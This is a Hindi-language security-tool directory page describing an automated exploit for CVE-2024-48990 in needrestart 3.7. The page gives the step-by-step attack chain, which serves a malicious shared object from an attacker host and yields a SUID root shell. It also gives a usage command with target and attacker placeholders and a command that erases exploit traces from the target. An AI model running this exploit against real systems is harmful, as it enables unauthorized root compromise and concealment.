Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-48990-Automatic-Exploit — CVE-2024-48990 (needrestart v3.7) के लिए स्वचालित स्थानीय विशेषाधिकार वृद्धि शोषण, PYTHONPATH अपहरण का लाभ उठाकर रूट पहुंच प्राप्त करने के लिए। | Kitploit
उपकरण/GitHubGitHub/serner77/cve-2024-48990-automatic-exploit
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubserner77/cve-2024-48990-automatic-exploit

CVE-2024-48990-Automatic-Exploit

CVE-2024-48990 (needrestart v3.7) के लिए स्वचालित स्थानीय विशेषाधिकार वृद्धि शोषण, PYTHONPATH अपहरण का लाभ उठाकर रूट पहुंच प्राप्त करने के लिए।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
99 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-48990 PYTHONPATH हाइजैक - विशेषाधिकार वृद्धि शोषण

यह उपकरण needrestart संस्करण 3.7 में एक विशेषाधिकार वृद्धि भेद्यता के शोषण को स्वचालित करता है, जिसे CVE-2024-48990 के रूप में पहचाना गया है।
यह needrestart द्वारा Python प्रक्रियाओं को स्कैन करते समय PYTHONPATH पर्यावरण चर के असुरक्षित उपयोग का लाभ उठाकर रूट निष्पादन प्राप्त करता है।

सारांश

शोषण इस प्रकार काम करता है:

  1. एक दुर्भावनापूर्ण साझा ऑब्जेक्ट (__init__.so) संकलित करना जो आयात पर ट्रिगर होता है।
  2. स्थानीय HTTP सर्वर के माध्यम से .so की सेवा करना।
  3. SSH के माध्यम से लक्ष्य से कनेक्ट करना और एक दुर्भावनापूर्ण PYTHONPATH पर्यावरण तैयार करना।
  4. एक Python बैट प्रक्रिया लॉन्च करना जो लगातार importlib आयात करती है।
  5. needrestart चलाना, जो हेरफेर किए गए PYTHONPATH को प्राप्त करता है, दुर्भावनापूर्ण मॉड्यूल लोड करता है, और पेलोड को रूट के रूप में निष्पादित करता है।
  6. पेलोड एक SUID बाइनरी (/tmp/poc) बनाता है, जो रूट शेल एक्सेस की अनुमति देता है।

उपयोग

अपने हमलावर मशीन से शोषण चलाएँ:

root@kitploit:~
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>

पैरामीटर:

  • --user लक्ष्य पर SSH उपयोगकर्ता नाम
  • --host लक्ष्य IP पता
  • --att-ip हमलावर IP (पेलोड होस्ट करने के लिए उपयोग किया जाता है)
  • --ssh-pass SSH पासवर्ड (SSH कुंजियों का उपयोग करने पर छोड़ दें)
  • --http-port वैकल्पिक HTTP पोर्ट (डिफ़ॉल्ट: 8000)

CVE

  • CVE ID: CVE-2024-48990
  • प्रभावित सॉफ्टवेयर: needrestart संस्करण 3.7
  • भेद्यता प्रकार: असुरक्षित पर्यावरण चर हैंडलिंग
  • प्रभाव: रूट तक स्थानीय विशेषाधिकार वृद्धि

सफाई

लक्ष्य से शोषण के निशान हटाने के लिए:

root@kitploit:~
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh

आवश्यकताएँ

हमलावर मशीन:

  • Python 3
  • pexpect (pip3 install pexpect)
  • gcc (पेलोड संकलित करने के लिए)
  • लक्ष्य तक खुली SSH पहुंच
  • python3 -m http.server (स्क्रिप्ट द्वारा स्वचालित रूप से शुरू)

लक्ष्य मशीन:

  • needrestart का एक भेद्य संस्करण (v3.7)
  • /usr/sbin/needrestart के लिए sudo NOPASSWD अधिकारों वाला एक गैर-रूट उपयोगकर्ता
  • Python 3 और curl स्थापित

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसे उन प्रणालियों पर उपयोग न करें जिनके आप स्वामी नहीं हैं या स्पष्ट अनुमति के बिना।

टूल डाउनलोड करें